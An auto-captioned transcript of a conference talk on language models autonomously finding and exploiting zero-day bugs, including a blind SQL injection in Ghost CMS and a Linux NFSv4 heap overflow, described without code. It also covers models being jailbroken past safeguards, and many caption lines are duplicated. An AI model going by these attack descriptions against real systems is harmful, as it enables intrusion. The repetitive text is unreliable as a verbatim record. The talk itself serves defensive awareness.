Nicholas Carlini - Black-hat LLMs | [un]prompted 2026

Full Transcript

https://www.youtube.com/watch?v=1sd26pWhfmg

[00:06] All right.
[00:09] So, before Nicholas speaks, I want to say a couple of words as well.
[00:14] I think that there are not that there are people in this industry who have been doing this for a long, long time truly understand this and can be considered the best.
[00:22] Now, who is the best one, the best two, the best three?
[00:25] I don't really know.
[00:27] But, we have the opportunity right now to listen to somebody who has not just been the best at this for the past year or the past two years, but for a long while and consistently makes the industry better just by doing his research, regardless of how much of that comes out.
[00:40] And I'll also tell you that he agreed last second and went through all the corporate uh PR nonsense that I don't know how much you have to do in Anthropic.
[00:47] It seems like you guys are easier than other people to manage to come here and give this talk to you today.
[00:52] So, I just want to get second for everybody for the last second, last minute getting into it thing and coming on stage and rushing in for handling truly in a global-level emergency or situation just to come and speak to us all.
[01:05] So, please, let's give it
[01:07] All. So, please, let's give it to Nicholas.
[01:14] Okay, thanks. Um yeah, so I'm Nicholas.
[01:17] Um I'm at Anthropic and I'm going to spend a little bit of time um just talking about some of the things that I'm interested in in in language model security.
[01:25] Um and I guess the thing that I've been caring about most recently has been I I I guess I don't know calling it black hat language models, but just trying to understand how we can use language models in order to make them cause harm.
[01:41] Not because I I want this to happen, right? That that would be bad.
[01:43] Um but, I want to understand what bad things people who wanted to cause harm would do so that then we can make that not possible.
[01:51] Okay.
[01:52] Um basic lesson that I hope you take away from this talk is um relatively simple.
[01:57] Um today, it is true that language models can autonomously and without fancy scaffolding um find and
[02:07] without fancy scaffolding um find and exploit zero-day vulnerabilities in very important pieces of software.
[02:10] exploit zero-day vulnerabilities in very important pieces of software.
[02:13] Uh this is not something that was true even, let's say, three or four months ago, um but it is now becoming true and I think it'll become only more true over the next couple of years.
[02:15] not something that was true even, let's say, three or four months ago, um but it
[02:17] say, three or four months ago, um but it is now becoming true and I think it'll
[02:19] is now becoming true and I think it'll become only more true over the next couple of years.
[02:21] become only more true over the next couple of years.
[02:23] couple of years.
[02:25] And so, the like, I don't know, if this is like the main lesson, the real thing I want you to take away is that like, they're getting really, really good really fast and this means that the like nice balance we had between attackers and defenders over the last 20 years or so uh seems like it's probably coming to an end and it really seems to me like the language models that we have now are probably like the most significant thing to happen in security um since we got the internet.
[02:27] is like the main lesson, the real thing I want you to take away is that like,
[02:29] I want you to take away is that like, they're getting really, really good
[02:31] they're getting really, really good really fast and this means that the like
[02:34] really fast and this means that the like nice balance we had between attackers and defenders over the last 20 years or so uh seems like it's probably coming to an end and it really seems to me
[02:36] nice balance we had between attackers and defenders over the last 20 years or so uh seems like it's probably coming to an end and it really seems to me
[02:39] and defenders over the last 20 years or so uh seems like it's probably coming to an end and it really seems to me
[02:41] so uh seems like it's probably coming to an end and it really seems to me like the language models that we have now are probably like the most significant thing to happen in security um since we got the internet.
[02:44] an end and it really seems to me like the language models that we have now are probably like the most significant thing to happen in security um since we got the internet.
[02:47] like the language models that we have now are probably like the most significant thing to happen in security um since we got the internet.
[02:49] now are probably like the most significant thing to happen in security um since we got the internet.
[02:51] significant thing to happen in security um since we got the internet.
[02:53] um since we got the internet. Um you know, like before we had the internet there was like not that much that you could do to attack someone else. Like, you'd have to like send them a floppy disk or something. Um you have now the internet, you can do remote attacks. Language models really feel to me to be something that's like roughly on this order of importance, which is not
[02:55] know, like before we had the internet there was like not that much that you could do to attack someone else.
[02:56] there was like not that much that you could do to attack someone else. Like, you'd have to like send them a floppy disk or something.
[02:58] could do to attack someone else. Like, you'd have to like send them a floppy disk or something.
[02:59] you'd have to like send them a floppy disk or something. Um you have now the internet, you can do remote attacks.
[03:02] disk or something. Um you have now the internet, you can do remote attacks.
[03:03] internet, you can do remote attacks. Language models really feel to me to be something that's like roughly on this order of importance, which is not
[03:05] Language models really feel to me to be something that's like roughly on this order of importance, which is not
[03:07] something that's like roughly on this order of importance, which is not
[03:08] order of importance, which is not something that I believed like, I don't know, three or four years ago.
[03:12] But, the models have gotten really, really good and I want to just give you a couple examples of what this is looking like.
[03:17] Okay.
[03:22] So, um let me show you how we've been finding some bugs in some really important software.
[03:27] Um and I'll show you what we found in just a second, but let me just like show you the scaffold that we've been using.
[03:33] Um uh here it is.
[03:35] Um this is basically the entirety of it.
[03:36] You know, we we have a couple more sentences here and there, um but basically we run Claude Claude code and we run it in a VM dangerously strict permissions, just like let it do whatever it wants.
[03:45] And then we say, "Hey, um you're playing in a CTF.
[03:48] Um please find a vulnerability and put the most serious one to this output file.
[03:52] Um go.
[03:54] And then we sort of walk away and we come back and we read the we read the vulnerability report and usually it's like pretty good and has found some pretty severe things.
[04:01] And and this basically works.
[04:03] Like, you can definitely do much better if you have fancier scaffolding.
[04:07] You can definitely do it cheaper if you
[04:08] You can definitely do it cheaper if you have fancier scaffolding.
[04:11] Um but, you have fancier scaffolding.
[04:13] Um but, you can do it just by like asking the model can do it just by like asking the model to find these bugs.
[04:15] And the reason why to find these bugs.
[04:16] And the reason why that matters to me is because what I care about is like, what is the base capability of the model?
[04:20] Because if someone who's malicious wants to go cause some harm and they don't have to spend six months designing some fancy fuzzing harness or something and they can just go do bad things with it, like this is quite quite scary.
[04:32] this is quite quite scary.
[04:33] Um okay.
[04:37] Um small little problem though with this.
[04:38] It's like a little deficient in two ways.
[04:40] One way is that um I can't do this at large scale.
[04:42] Like, if I if I take a piece of software and I ask Claude to find the same vulnera- to find a bunch of vulnerabilities and run it multiple times, it will probably find the same bug each time.
[04:53] Um I don't know, it just turns out to be the case that this is what happens.
[04:55] Um also like it's just not very thorough.
[04:57] Um it will review some of the code, but not all of the code.
[05:02] And so, we have a very simple trick for this, um which is I'm just going to add one more line um and I'm going to say like, "Hint, please look at this file foo.c."
[05:08] Uh and then
[05:11] look at this file foo.c.
[05:12] Uh and then what I could do is I wanted to like,
[05:12] what I could do is I wanted to like,
[05:13] "Okay, now look at bar.c. Now look at some other file."
[05:14] And I could just like do this for like all of the files in the project.
[05:16] And then we'll find and like look at least at all of them and like this works quite well.
[05:20] this works quite well.
[05:22] Okay.
[05:24] Um
[05:26] We wrote a blog post where we talked about some things that we can find.
[05:31] Uh
[05:32] the blog post exists, so I I'm not going to tell you about the bugs that we had in there.
[05:36] Um we talked about a bunch of them, um but it's been now roughly a couple weeks since this blog post came out.
[05:41] So, I'd like to tell you about a couple new ones that have been fixed that now we can talk about because um you know, that they've been patched.
[05:49] Um so, I'm going to tell you in particular about two that I think are interesting.
[05:52] One interesting because of how Claude could find an autonomous exploit and one because of the vulnerability that it found is quite interesting.
[06:00] So, first one, web apps.
[06:03] Um okay, so I I used to be a security person.
[06:06] Um Web apps is like the thing that every security person always finds bugs in.
[06:09] They're really bad. Um
[06:11] They're really bad.
[06:12] Um Here's this content management system called Ghost.
[06:14] Um I hadn't seen it before, but like 50,000 stars on GitHub.
[06:17] It's like, I don't know, apparently quite pop- quite popular.
[06:20] Um has never had a critical security vulnerability in history of the project.
[06:21] We found the first one.
[06:23] Um what's the vulnerability?
[06:26] The vulnerability um is SQL injection.
[06:29] It turns out that they were concatenating some strings and some user input went into some SQL query.
[06:35] Everyone knows that this is like a problem.
[06:38] It's like not really a surprise to anyone and yet like, I don't know, like they've been around for 20 years and they're going to be around for another 20, right?
[06:45] Like it's like this is not that surprising the model can find these bugs.
[06:48] But, what's interesting to me is that this particular vulnerability you can only exploit with a blind SQL injection, meaning I don't actually see the output.
[06:55] I can only observe like how long it takes in time or crashes or not crashes.
[06:59] And uh I I wasn't sure if this was exploitable and so I wanted to build you know, send a good report to the maintainers.
[07:06] And so, I was like, "Okay, like is this some low severity thing that like, you know, maybe I can like leak a couple bits here and there or is
[07:11] leak a couple bits here and there or is this really important?
[07:12] this really important? I asked the model like, you know, "Give me the worst that you can."
[07:15] Um and so, it wrote me this.
[07:17] Um so, okay, here let me play a demo.
[07:20] I'm going to launch um on this one window here a Docker container that just is running Ghost.
[07:24] Um I have my own instance of it running now.
[07:26] Um I've logged in with admin um at example.local yeah, with some some yeah, admin here.
[07:31] And then I run the exploit on uh this thing.
[07:34] Um and like I wrote none of this code um and blind SQL injection, it just reads off the like complete credentials from the production database.
[07:45] Um no authentication.
[07:47] Um it reads the admin API key and secret, which lets me mint arbitrary new things that I want.
[07:52] I can do now anything that I want to the production app and it reads off the hash of the password.
[07:58] Um okay, fortunately it's bcrypt um you know, so that's good.
[08:01] But, again like it sort of like it gives you literally everything that you could want from un- unauthenticated accounts.
[08:04] Um and like I probably could have built this attack.
[08:08] Like, this attack is not super hard, but
[08:13] Like, this attack is not super hard, but like there's some amount of nuance you need in order to get this to go right.
[08:16] And like I didn't need any security experience in order to have this happen.
[08:21] So, these models like are really quite good at actually implementing um these exploits now.
[08:25] And this sort of fundamentally changes the way that things these things go.
[08:29] Um so, this is one example of attack that was possible because the model was particularly good at doing the exploitation piece.
[08:35] Um let me now spend a couple of minutes on another side where it's particularly good because of the bugs it can find.
[08:44] Um so, Linux kernel.
[08:47] Um one of like the most important pieces of software that we all use every day.
[08:51] Um very, very, very hardened.
[08:52] Um We now have a number of remotely exploitable um heap buffer overflows in the Linux kernel.
[08:58] Um I have never found one of these in my life before.
[09:00] Uh this is like, I don't know, very, very, very hard to do.
[09:05] Um with these language models, I have a bunch.
[09:07] Like, this is, I don't know, quite quite scary to me.
[09:11] Um let me walk you through one of them,
[09:13] Um let me walk you through one of them, which is in the NFS um which is in the NFS um V4 daemon in the kernel.
[09:17] V4 daemon in the kernel.
[09:20] And um pay attention to sort of how this attack works and then remember in the back of your mind that a language model found this.
[09:23] Okay, so um you have a client connecting to the NFS server and it sort of does the three-way thing like, "Hello, I would like to talk to you."
[09:31] The server says, "Okay."
[09:32] And then it responds.
[09:33] Uh and the client, it's you know, talking to NFS, so it says, "I'd like to open up this lock file."
[09:39] And the server says, "Great."
[09:40] And the client acknowledges that.
[09:42] Um and then it takes out a lock and puts um as its name um a 1024-byte um sort of value of who the person is who owns the lock.
[09:50] Uh the server says it's granted and so we're we're good here.
[09:53] Um then what the attacker does is it creates a second client, client B, that talks to the server.
[09:58] Um which again says hello, um I'd like to go to talk to you.
[10:01] The server says great, um I have acknowledged you as client B.
[10:06] Client B says I'd also like to take an um an open on this other lock, and the server says great, you can do that.
[10:10] Um and um then takes the lock here.
[10:15] and um then takes the lock here.
[10:17] And at this point client A already owns this lock, so you can't grant the lock also to client B.
[10:22] And so the server says like okay, like deny the lock, this is not something that's allowed.
[10:27] Except what happens is that the response that it's going to now send to client B is going to be something that's going to be um 1,056 bytes long.
[10:37] Um it's going to have some offset and some length, and then it has this owner, um and the owner is the bytes that came from the first attacker.
[10:44] And so those bytes are now copied here, and it turns out that it's going to write this into a buffer of size 112, which gives you now a heap buffer overflow in the kernel.
[10:53] Okay, not that great.
[10:58] A language model found this.
[11:00] Like this is not like a like trivial bug.
[11:03] Like you have to like understand that there are like two competing or two cooperating adversaries, you know, like who are like, you know, one of them has a long thing here, and you send like, you know, a bunch of packets over there.
[11:16] Like you would never find this by fuzzing, um and by the way, this entire slide was copy and pasted from the report that the language model wrote.
[11:19] Fuzzing, um and by the way, this entire slide was copy and pasted from the report that the language model wrote.
[11:20] Like like it produced this very nice flow schematic like I I literally just copied and pasted this.
[11:23] Like like it produced this very nice flow schematic like I I literally just copied and pasted this.
[11:26] The model produced this schematic explaining to me how the attack works.
[11:27] The model produced this schematic explaining to me how the attack works.
[11:29] Um and so like it's really quite good at doing these kinds of things, um far better than I think people give them credit for.
[11:30] Um and so like it's really quite good at doing these kinds of things, um far better than I think people give them credit for.
[11:32] Um and so like it's really quite good at doing these kinds of things, um far better than I think people give them credit for.
[11:35] Um and so like when when you're finding these these bugs with these things, it's like we used to live in a world where we assumed that like we had to like hold their hand in order to help them kind of like, you know, a fuzzer.
[11:37] Um and so like when when you're finding these these bugs with these things, it's like we used to live in a world where we assumed that like we had to like hold their hand in order to help them kind of like, you know, a fuzzer.
[11:38] Um and so like when when you're finding these these bugs with these things, it's like we used to live in a world where we assumed that like we had to like hold their hand in order to help them kind of like, you know, a fuzzer.
[11:41] You know, like it can sort of do a little things here and there, but no, like it it's it This is a bug.
[11:42] You know, like it can sort of do a little things here and there, but no, like it it's it This is a bug.
[11:44] Um like here's the commit that introduced the bug.
[11:46] Um sorry, it's not a commit, it's a change set.
[11:49] Why is it a change set that can that introduced this bug? Because this bug predates Git.
[11:51] Why is it a change set that can that introduced this bug? Because this bug predates Git.
[11:52] Like this bug has been in the kernel since 2003, and it's older than some of you in this room.
[11:54] Like this bug has been in the kernel since 2003, and it's older than some of you in this room.
[11:58] Right? Like like this is like a really old bug that has been found by this by
[11:59] Right? Like like this is like a really old bug that has been found by this by
[12:00] Right? Like like this is like a really old bug that has been found by this by
[12:18] old bug that has been found by this by the language models.
[12:20] Right?
[12:20] Like it's like a very non-trivial kind of thing that like the language models have been able to do here.
[12:24] Right?
[12:26] Like I Speechless like like is like does not begin to describe like these models like really can do some some very impressive things, and it's like, you know, we we really need to start rethinking um the kinds of things that um I don't know if you spend like a little bit of time thinking forwards like we've only just seen the models that can do this like in the last couple of months.
[12:48] Like the first models that that can find these kinds of vulnerabilities were really only introduced a couple of months ago.
[12:54] We sort of tried to see how often um we could reproduce these kinds of bugs with older models that were released I don't know okay, so sign of 4.5 was released like only 6 months ago, and Opus 4.1 is less than a year old.
[13:07] Those ones can't find these bugs almost ever.
[13:10] The new models released over the last 3 months, 4 months can.
[13:13] So like well like it's like just on the edge of being able to do these kinds of bugs, and like this is not the last model
[13:18] and like this is not the last model that's going to exist.
[13:20] Like there are going to be more, and they're going to keep on getting better.
[13:23] Um and like in a very very real sense, we are like on this exponential.
[13:26] Um you've probably seen this plot more times than you wanted to see it.
[13:30] It's this plot from Meter that shows as a function of model release date um how long of a task that they can do that humans take.
[13:39] So recent models, the most recent models can do tasks that take humans roughly 15 hours, and they can succeed at that roughly half of the time.
[13:48] Um this is a nice plot by Meter.
[13:50] Um we tried to produce a similar version of this plot.
[13:52] Oh yeah, by the way, um doubling time every 4 months.
[13:54] So I don't know, be a little worried there if this trend continues.
[13:57] Maybe it doesn't, but like, you know, if it continues for like another year, um we're going to, you know, have these models producing like, you know, large amounts of code that um better than most of us.
[14:09] Um So we tried to produce a similar kind of plot where um instead of looking at uh you know, how long of a duration of a task that models can do, we we tried to
[14:19] task that models can do, we we tried to look um okay, smart contracts.
[14:22] Okay, why smart contracts?
[14:23] Because they have dollar values associated with them.
[14:26] And so you can ask how much money can I steal from a smart contract by having a language model find and exploit a vulnerability?
[14:32] And so okay, this is from a paper um by by two of our math scholars, Winnie and Cole.
[14:40] And and what they showed was that recent language models um can identify and exploit vulnerabilities and recover like several million dollars from like actual real smart contracts.
[14:53] Um and that the rate of their ability to do this is again going exponentially.
[14:56] Note the log scale on the Y axis here again.
[14:59] And so like these models are getting really really good at doing these kinds of things.
[15:03] And again, I have no reason to believe that they're going to stop getting better at this continuing rate.
[15:08] Okay, I'm like sort of coming back to the slides.
[15:11] I think like this really is the thing I want you to take away.
[15:12] It's not where we are at this moment in time.
[15:15] Yes, at this moment in time, the models can find vulnerabilities in the Linux kernel.
[15:17] Yes, at this moment in time they
[15:20] kernel. Yes, at this moment in time they can find, you know, these critical CVEs.
[15:22] can find, you know, these critical CVEs um in really important software that people use.
[15:24] um in really important software that people use.
[15:25] But like the rate of progress is very large, and so you should expect that like the best models can do this today, the like average model you have on your laptop probably can do this in a year.
[15:28] progress is very large, and so you should expect that like the best models can do this today, the like average model you have on your laptop probably can do this in a year.
[15:30] can do this today, the like average model you have on your laptop probably can do this in a year.
[15:32] model you have on your laptop probably can do this in a year.
[15:34] can do this in a year.
[15:37] Um.
[15:40] I'm a skeptical person. I didn't believe in language models for a very long time.
[15:42] I'm a skeptical person. I didn't believe in language models for a very long time.
[15:44] in language models for a very long time.
[15:47] Uh when I first saw language models, the only thing that I did with them was like I I sort of prodded them and made fun of sort of how how how easily they broke.
[15:48] only thing that I did with them was like I I sort of prodded them and made fun of sort of how how how easily they broke.
[15:50] sort of how how how easily they broke.
[15:53] Um but like they actually are quite good right now.
[15:55] Um but like they actually are quite good right now. They of course have problems, but you can't just stick your head in the sand.
[15:58] right now. They of course have problems, but you can't just stick your head in the sand.
[16:00] but you can't just stick your head in the sand.
[16:01] sand. Like these things are working really really well.
[16:03] Like these things are working really really well.
[16:05] really really well.
[16:07] Um and like you know, there are some people who say, you know, it's on an exponential.
[16:08] you know, there are some people who say, you know, it's on an exponential.
[16:11] I I I agree the exponential is not going to last forever, um I remember when CPUs were getting exponentially faster every couple of years.
[16:12] agree the exponential is not going to last forever, um I remember when CPUs were getting exponentially faster every couple of years.
[16:14] last forever, um I remember when CPUs were getting exponentially faster every couple of years.
[16:17] I remember when CPUs were getting exponentially faster every couple of years.
[16:18] exponentially faster every couple of years. Right? Like this is the fastest
[16:20] years.
[16:20] Right?
[16:20] Like this is the fastest CPU that Intel produced every year.
[16:22] CPU that Intel produced every year starting from the 4004 um up until the first Pentiums um in 2000.
[16:24] Very nice clean exponential.
[16:28] And then of course, you know, the exponential tapers off,
[16:30] it's no longer exponential, what do you know?
[16:32] Um there is going to be a bend.
[16:34] No one denies this.
[16:35] No exponential can continue forever.
[16:37] Um but it's very hard to predict when the bend is going to happen.
[16:41] Like maybe the bend happens in 6 months.
[16:43] Maybe in 6 months it's the case that the models are no longer getting exponentially better.
[16:46] Maybe it happens in 2 years.
[16:48] And when the bend happens will matter quite a lot for what capabilities these models have,
[16:49] and I think you should not assume that like it's definitely going to happen in a couple of months because people have been saying this forever.
[16:50] For like the last 10 years people have been saying deep learning is going to hit a wall, and at least as of yet it has not.
[16:53] And so like we should be willing to entertain the possibility that it might, especially as security people.
[16:55] Right?
[16:57] Like so I I I went to a conference at Crypto where I gave a talk.
[16:59] And and I
[17:21] Crypto where I gave a talk.
[17:24] And and I observed that like 10 of the papers at this conference were on post-quantum cryptography.
[17:27] I I I don't know if you know this, but like we don't have quantum computers, and yet cryptographers are working on post-quantum cryptography because they understand that it is worth investing in defending against something that we don't have in front of us right now.
[17:40] And yet here is a thing that I have literally right in front of me right now finding these kinds of bugs, and I often talk to talk to security people, and they're in denial about it.
[17:49] So we like we really really like we should really need to understand this is the the this is the exponential we're on.
[17:54] Um this is a fun slide that I like to show.
[17:59] Um this is from uh the uh International Energy Agency, which every year um makes a prediction for how much um of various kinds of energy people are going to be using for generation.
[18:09] Um and here's the plot for how much solar is actually being deployed versus their predictions.
[18:16] Uh the red lines are their predictions from every point in time, white is what's actually true.
[18:20] Um For more than half of the years, their
[18:23] For more than half of the years, their prediction for what would happen in 2040 prediction for what would happen in 2040 happened the next year.
[18:29] happened the next year.
[18:30] From like you would think that they would have learned like the 15th time that this happened that you should make a continue like exponential trend, but every year they assume that things will continue at roughly the current rate, and every year it goes up by, I don't know, another 30 40%.
[18:46] We should not be them.
[18:48] Like we should sort of understand that these things have been getting exponentially better every every couple months for the last couple of years.
[18:56] And it may be the case that things flatten out, but probably not, at least probably not for like the next couple of months.
[19:02] So like we should like and I think, you know, these next couple of months will really be some of the most important couple of months for security.
[19:08] Okay, um I have 2 minutes left for a conclusion.
[19:14] Um It's pretty clear to me that these current models are better vulnerability researchers than I am.
[19:18] Um I used to do this uh somewhat professionally.
[19:21] Um I have CVEs to my name.
[19:21] Um I do not have
[19:25] have CVEs to my name.
[19:25] Um I do not have Okay, now I do, but I did not have CVEs
[19:27] Okay, now I do, but I did not have CVEs in the Linux kernel.
[19:29] Like these models are better vulnerability researchers
[19:30] than I am.
[19:32] It's probably not yet better than all of you, but at some point it
[19:34] will be.
[19:36] Like if we if we if we continue on this trend for even just another
[19:37] year, they'll probably be better
[19:39] vulnerability researchers than all of
[19:40] you.
[19:41] And I don't know what that world looks like.
[19:43] Like it's like quite scary to live in a world where you can automatically
[19:45] find bugs that like previously only like the top one or two like, you know,
[19:47] people in the world could have found.
[19:49] Um
[19:51] So maybe my call to action is help us make the future go well.
[19:53] We're going to need all the help that we can get.
[19:55] Um for our part at Anthropic um this Claude code security that is trying
[19:58] to do something to to find bugs.
[20:00] Um you heard earlier today from DeepMind um OpenAI has their um their Aardvark
[20:01] project.
[20:05] Speaking not as an Anthropic employee like I don't really care where you help.
[20:07] Just please help.
[20:10] Like you know I I it would be great if you would like to you
[20:25] would be great if you would like to you know help us at Anthropic too, but like
[20:27] know help us at Anthropic too, but like I just the world will need a lot of
[20:29] I just the world will need a lot of people to be doing a lot of this work
[20:31] people to be doing a lot of this work and it needs to happen soon. Like order
[20:35] and it needs to happen soon. Like order months. I think like waiting a year is
[20:37] months. I think like waiting a year is going to be too long. Um we are going to
[20:40] going to be too long. Um we are going to have a huge number of bugs. I have so
[20:43] have a huge number of bugs. I have so many bugs in the Linux kernel that I
[20:45] many bugs in the Linux kernel that I can't report because I haven't validated
[20:46] can't report because I haven't validated them yet. I'm not going to make that
[20:48] them yet. I'm not going to make that some open source developer validate bugs
[20:49] some open source developer validate bugs that I I haven't checked yet. Like I'm
[20:51] that I I haven't checked yet. Like I'm not going to send them to you know
[20:52] not going to send them to you know potential slop, but this means that like
[20:54] potential slop, but this means that like I now have I don't know several hundred
[20:56] I now have I don't know several hundred crashes that they haven't seen because I
[20:58] crashes that they haven't seen because I haven't had time to check them. Um we
[21:01] haven't had time to check them. Um we need to find a way to fix this so that
[21:02] need to find a way to fix this so that we can actually go through all this
[21:03] we can actually go through all this stuff because soon it's not just going
[21:05] stuff because soon it's not just going to be me who has all of this, but it's
[21:07] to be me who has all of this, but it's going to be anyone malicious in the
[21:08] going to be anyone malicious in the world who wants.
[21:10] world who wants. So really um yeah.
[21:12] So really um yeah. I'd encourage you to find a way to try
[21:14] I'd encourage you to find a way to try and find a way to see if um you know
[21:16] and find a way to see if um you know some particular set of skills that you
[21:18] some particular set of skills that you have could like help us make sure things
[21:20] have could like help us make sure things go well over the next couple of months
[21:21] go well over the next couple of months and over the next couple of years
[21:23] and over the next couple of years because I am quite worried about how
[21:25] because I am quite worried about how this direction is heading um and yeah
[21:27] this direction is heading um and yeah well we need all the help we can get. Um
[21:30] well we need all the help we can get. Um thank you.
[21:40] Um while I wait for questions, I'll just
[21:42] Um while I wait for questions, I'll just leave this video playing in the
[21:44] leave this video playing in the background.
[21:45] background. What's what's what's what what should we
[21:47] What's what's what's what what should we be watching for? Uh just just watch.
[21:49] be watching for? Uh just just watch. It's fine. Um you Let's take a question.
[21:51] It's fine. Um you Let's take a question. That's hardly fair.
[21:53] That's hardly fair. Uh let's say yeah I'm sure there are
[21:55] Uh let's say yeah I'm sure there are questions. Let's uh let's take some.
[21:56] questions. Let's uh let's take some. I'll take from over here first.
[22:00] Hello. Hello.
[22:01] Hello. Hello. Hey. Uh hi. I'm Nabin from Palo Alto
[22:04] Hey. Uh hi. I'm Nabin from Palo Alto Networks. So
[22:06] Networks. So I'm wondering like given the future
[22:09] I'm wondering like given the future where bugs will be found autonomously
[22:12] where bugs will be found autonomously like the one we can't find as you
[22:13] like the one we can't find as you mentioned.
[22:15] mentioned. Is like since you guys have the
[22:17] Is like since you guys have the visibility, should we think about
[22:19] visibility, should we think about something like to identify the malicious
[22:21] something like to identify the malicious intent?
[22:22] intent? Because it would be impossible for us to
[22:25] Because it would be impossible for us to fix all the zero day bugs in all the
[22:27] fix all the zero day bugs in all the repos around the world. What's your
[22:29] repos around the world. What's your thought because you guys have the
[22:31] thought because you guys have the control? What can we do in that regard?
[22:34] control? What can we do in that regard? Thank you.
[22:35] Thank you. Yeah. Um
[22:37] Yeah. Um Yeah. So identifying malicious intent is
[22:40] Yeah. So identifying malicious intent is hard because security is dual use.
[22:42] hard because security is dual use. Um I want to allow people to use the
[22:46] Um I want to allow people to use the models to find bugs to fix things.
[22:49] models to find bugs to fix things. If the the developer of the software, I
[22:52] If the the developer of the software, I would ideally not like to let someone
[22:54] would ideally not like to let someone use the software to go and exploit
[22:56] use the software to go and exploit things. And for a very long time in
[22:58] things. And for a very long time in security like we've always understood
[23:01] security like we've always understood that the dual use nature favored the
[23:02] that the dual use nature favored the defender. You know.
[23:05] defender. You know. Pick any software that's that's that
[23:07] Pick any software that's that's that that exists.
[23:08] that exists. It generally favors the defender more
[23:10] It generally favors the defender more than the attacker. I think this has been
[23:11] than the attacker. I think this has been true and this has been the way that
[23:13] true and this has been the way that we've been operating in the past. Um
[23:16] we've been operating in the past. Um it's unclear if this will always be true
[23:18] it's unclear if this will always be true in the future especially for language
[23:19] in the future especially for language models as we go forwards. Um
[23:21] models as we go forwards. Um and so I do want to make sure that we
[23:24] and so I do want to make sure that we keep people can't use these things for
[23:25] keep people can't use these things for harm. And indeed like you know
[23:27] harm. And indeed like you know Anthropic's models and OpenAI's models
[23:29] Anthropic's models and OpenAI's models and DeepMind's models um will generally
[23:31] and DeepMind's models um will generally refuse if you're like very explicitly
[23:33] refuse if you're like very explicitly doing nasty things. Um clearly they need
[23:36] doing nasty things. Um clearly they need to get better if they're going to be
[23:37] to get better if they're going to be able to refuse everything, but um
[23:40] able to refuse everything, but um you know it
[23:43] I don't want to like not let people be
[23:45] I don't want to like not let people be honest defenders um because
[23:49] honest defenders um because Okay. So the way I think about this is
[23:52] Okay. So the way I think about this is if I put a safeguard in place that's
[23:54] if I put a safeguard in place that's very very weak, it will only stop the
[23:56] very very weak, it will only stop the good people from using the software. The
[23:58] good people from using the software. The bad people are just going to jailbreak
[23:59] bad people are just going to jailbreak the model and they're going to still
[24:00] the model and they're going to still attack it anyway.
[24:02] attack it anyway. And so I but the good people won't.
[24:03] And so I but the good people won't. They're not going to circumvent the
[24:04] They're not going to circumvent the safeguards. And so I want to make sure
[24:05] safeguards. And so I want to make sure the good people have access to the
[24:06] the good people have access to the software, but if I put too strong
[24:08] software, but if I put too strong safeguards in place then they don't have
[24:09] safeguards in place then they don't have access to the software. And so I think
[24:11] access to the software. And so I think it's like just it's it's very nuanced
[24:13] it's like just it's it's very nuanced how you want to do this. And everyone is
[24:15] how you want to do this. And everyone is like trying their best to find the right
[24:16] like trying their best to find the right balance and I think we're doing an okay
[24:18] balance and I think we're doing an okay job, but um you know I think this is one
[24:21] job, but um you know I think this is one of the areas where we need a lot more
[24:23] of the areas where we need a lot more help to figure out how to do this
[24:25] help to figure out how to do this better.
[24:26] better. Hi.
[24:27] Hi. I'm Michael Siegel from MIT. Just wanted
[24:30] I'm Michael Siegel from MIT. Just wanted to ask um
[24:31] to ask um comment on both the speed that is as
[24:34] comment on both the speed that is as this becomes faster,
[24:36] this becomes faster, uh the bad guys will have things faster
[24:39] uh the bad guys will have things faster and they'll also be concerned that they
[24:41] and they'll also be concerned that they will be fixed faster. So for a period of
[24:44] will be fixed faster. So for a period of time we're going to be dealing a lot
[24:45] time we're going to be dealing a lot with changes in speed. And then what's
[24:48] with changes in speed. And then what's sort of the end game? Do we There's been
[24:51] sort of the end game? Do we There's been a long-term argument about whether
[24:53] a long-term argument about whether vulnerabilities are dense or sparse and
[24:55] vulnerabilities are dense or sparse and ultimately if we get this good at
[24:57] ultimately if we get this good at things, do we really get down to really
[25:00] things, do we really get down to really almost no vulnerabilities?
[25:03] almost no vulnerabilities? Two questions. Um okay. Great question.
[25:06] Two questions. Um okay. Great question. Um
[25:07] Um I tend to think and many people tend to
[25:09] I tend to think and many people tend to think that in the long term probably the
[25:11] think that in the long term probably the defenders win.
[25:12] defenders win. Like you know in the limit, I'll just
[25:14] Like you know in the limit, I'll just like rewrite all the software in Rust
[25:16] like rewrite all the software in Rust and I just like get rid of memory
[25:17] and I just like get rid of memory corruption vulnerabilities and in the
[25:19] corruption vulnerabilities and in the limit I'll like you know formally verify
[25:21] limit I'll like you know formally verify all of my protocols. You know TLS is
[25:23] all of my protocols. You know TLS is proved now to be safe under like you
[25:25] proved now to be safe under like you know various assumptions. I'll like I'll
[25:26] know various assumptions. I'll like I'll prove everything and like in the limit
[25:28] prove everything and like in the limit like this is good. Um
[25:30] like this is good. Um but like in the transitionary period
[25:32] but like in the transitionary period between now and then, things probably
[25:34] between now and then, things probably are very bad. And like this is I think
[25:36] are very bad. And like this is I think why I particularly want people to help
[25:38] why I particularly want people to help like immediately
[25:40] like immediately is because the transitionary period is
[25:42] is because the transitionary period is where I'm most worried and like we are
[25:44] where I'm most worried and like we are in the transitionary period now. And so
[25:46] in the transitionary period now. And so I think like yeah we need quite a lot of
[25:47] I think like yeah we need quite a lot of help making sure that even if things
[25:50] help making sure that even if things will go well in the future um that the
[25:52] will go well in the future um that the things will be uh at least not bad now.
[25:56] things will be uh at least not bad now. Um you know I think the other analogy
[25:58] Um you know I think the other analogy people like to give is you know the
[26:00] people like to give is you know the industrial revolution um all else equal
[26:02] industrial revolution um all else equal was a good thing, but for the people who
[26:04] was a good thing, but for the people who were living through it, it was like kind
[26:06] were living through it, it was like kind of hard.
[26:07] of hard. Um we sort of like want to make things
[26:10] Um we sort of like want to make things go well um you know for the people who
[26:12] go well um you know for the people who are living through the thing um but not
[26:15] are living through the thing um but not uh you know but still like get us to the
[26:16] uh you know but still like get us to the nice end state. Um and just yeah making
[26:19] nice end state. Um and just yeah making that happen is going to be yeah
[26:21] that happen is going to be yeah challenging.
[26:22] challenging. Yeah. Thank you.

Nicholas Carlini - Black-hat LLMs | [un]prompted 2026

Full Transcript

Summary

Key points

Cite this page